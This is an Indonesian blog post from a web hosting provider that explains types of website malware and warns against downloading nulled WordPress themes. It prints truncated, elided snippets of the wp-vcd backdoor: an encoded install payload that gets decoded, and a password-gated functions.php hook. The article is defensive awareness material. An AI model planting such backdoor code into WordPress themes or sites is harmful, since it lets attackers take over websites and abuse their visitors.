Kenali Bahaya Malware Website

Bahaya Malware Website

Bahaya Malware WebsiteKENALI BAHAYA MALWARE WEBSITE

Malware Website – Di jaman yang semakin modern ini, sudah banyak yang menggunakan website untuk kepentingan pemasaran bisnis atau usaha. Website ini akan membantu kita dalam pemasaran dan menggaet banyak konsumen. Namun tidak hanya kelebihan yang terdapat pada website kita. Pada website ini terdapat juga beberapa kendala bahaya, yaitu salah satunya adalah malware.

Apa Itu Malware

Malware adalah singkatan dari Malicious Software, Artinya sendiri adalah sebuah software yang dirancang dengan tujuan untuk membahayakan, menyusup, atau merusak sebuah komputer. Penjelasan mengenai Malware dapat Anda baca disini.

Pada artikel ini akan dibahas mengenai bagaimana sebuah website diserang oleh malware.

Jenis Malware Pada Website

Backdoor

Backdoor adalah salah satu jenis malware yang bersarang pada website, biasanya backdoor ini menggunakan script shell-backdoor. Backdoor ini ditanam oleh hacker yang sudah menyusupi website Anda, dibawah ini adalah salah satu contoh Shell Backdoor.

Baca Juga: 7 Alasan Website Mudah di Hack.

PopUp Ads Malware

Jika Anda menggunakan CMS WordPress dan sering menggunakan theme atau plugins yang nulled (free) yang didownload dari website yang tidak resmi, maka pasti Anda pernah merasakan ada Ads yang menempel di website. Ads Malware ini adalah termasuk malware injected, jadi dari scriptnya tersendiri sudah terinfeksi malware, ketika dideploy di website maka malware tersebut akan berjalan otomatis.

Ads ini bekerja jika Anda membuka website yang terinfeksi kemudian akan diredirect ke website asing.

Phishing

Ini juga termasuk salah satu bentuk malware, jenis ini termasuk berbahaya karena biasa digunakan untuk scamming. Yaitu bentuk penipuan atau seakan-akan menyamakan dengan yang asli. Halnya seperti halaman login ke Internet Banking, menampilkan form login tetapi sebenarnya bukan dari Bank resmi. Jika Anda tidak waspada, maka data-data yang Anda masukkan dapat masuk ke log Hacker dan dapat menyalahgunakan data-data Anda.

Spamming

Jenis ini menjadi salah satu ancaman terbanyak pada pengguna website di Internet, bagaimana tidak. Salah satu email account yang terdaftar di account hosting Anda dapat digunakan untuk mengirim email masal dan bertubi-tubi ke alamat yang berbeda, biasanya Hacker menyisipkan email scam untuk mendapatkan data yang di-inginkan dari target mereka.

Ransomware

Beberapa tahun lalu sempat viral berita tentang ada Ransomware yang menyerang hampir 200ribu komputer di 150 negara di Dunia. Yaitu Wannacry, yang mengakibatkan kerugian jutaan dollar, jenis ini melakukan deny access atau menolak akses ke komputer yang terkena Ransomware. Biasanya, korban diminta memberikan sejumlah uang dalam bentuk dollar, bitcoin untuk menebus data-data komputer mereka yang di-lock.

Botnet Attack

Jenis ini sangat berbeda dari beberapa jenis diatas, karena cara kerjanya ini melakukan attack seperti DDoS, menyebarkan malware ke website lain, bahkan spam dan scam. Botnet attack bekerja dengan sebuah script yang tertanam di server, dengan menggunakan cronjob maka botnet tersebut bisa berjalan otomatis sesuai waktu yang di-set pada Cronjob.

Penyebab Website Diserang Malware

Ada banyak penyebab website dapat diserang malware, salah satunya jika menggunakan CMS WordPress yaitu pada saat Anda melakukan download theme dari website yang tidak resmi, seperti pada website Downloadfreethemes. Di website tersebut menyajikan banyak theme premium namun sudah di-inject script malware terlebih dahulu.

wp-vcd.php di WordPress

Banyak sekali yang mengeluhkan script ini, seperti yang diketahui, script wp-vcd.php bukan script original ataupun core dari wordpress, ini adalah script malware. Dibawah ini adalah contoh isinya.

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[.....]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code =
str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Ada script yang diencode, karena untuk script malware selalu diencode atau dienkripsi.

functions.php di Directory Themes.

Selain wp-vcd.php, ada jug functions.php pada directory themes yang digunakan, dapat dilihat bahwa pada script dibawah ini connect ke wp-vcd.php.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f98cd901d7551a69caf41ba758a7c972'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
[......]
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

Dengan menggunakan Imunify360 akan terdeteksi sebagai virus dan dapat dikarantina secara otomatis.

Baca juga: Atasi Malware Website dengan Cara Ini

Kesimpulan:

Mulai sekarang, harus hati-hati dalam beraktivitas pada website yang kita miliki, peduli dengan adanya ancaman serangan hacker maupun serangan malware.

Yang paling penting adalah hindari download theme dari website yang tidak resmi seperti diatas, akan menciptakan malware yang dapat mengganggu fungsional website maupun aktivitas pengiriman email, karena bisa jadi menciptakan email spamming.

Di Dewaweb sendiri sudah tersedia fitur atau fasilitas teknologi security based on AI, yaitu Imunify360. Namun hal ini tidak selalu bisa jadi patokan, kalau dari penggunanya sendiri belum sadar akan bahaya malware dan serangan hacker.

Yuk, peduli dengan hal tersebut dan amankan website kamu dengan banyak fasilitas security di Dewaweb!

Jangan sungkan untuk meninggalkan ide-ide topik yang ingin Anda baca di blog Dewaweb. Semoga artikel ini membantu!

JOGJA ONE SOLUTION – KURSUS BISNIS ONLINE JOGJA | JASA PROMOSI JOGJA | JASA PEMBUATAN WEBSITE JOGJA | INTERNET MARKETING JOGJA | JASA SEO JOGJA | AHLI WEBSITE | PELATIHAN INTERNET MARKETING | SOFTWARE APLIKASI JOGJA | JASA SOFTWARE JOGJA Kami hadir memberi solusi untuk kebutuhan media promosi bisnis atau usaha Anda. Grafik order dan omzet meningkat. Dapatkan website murah, desain menarik, kompleks, dan full maintenance dengan harga yang terjangkau KLIK DISINI. Atau hubungi kami di Telp (0274) 5017127 | WA : 0888 0289 8802


Digital Content Writer, Special Content Creator, Technical Content Writer dan Suka berbagi hal baru yang bermanfaat bagi orang lain.

Recommended Posts

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

WhatsApp chat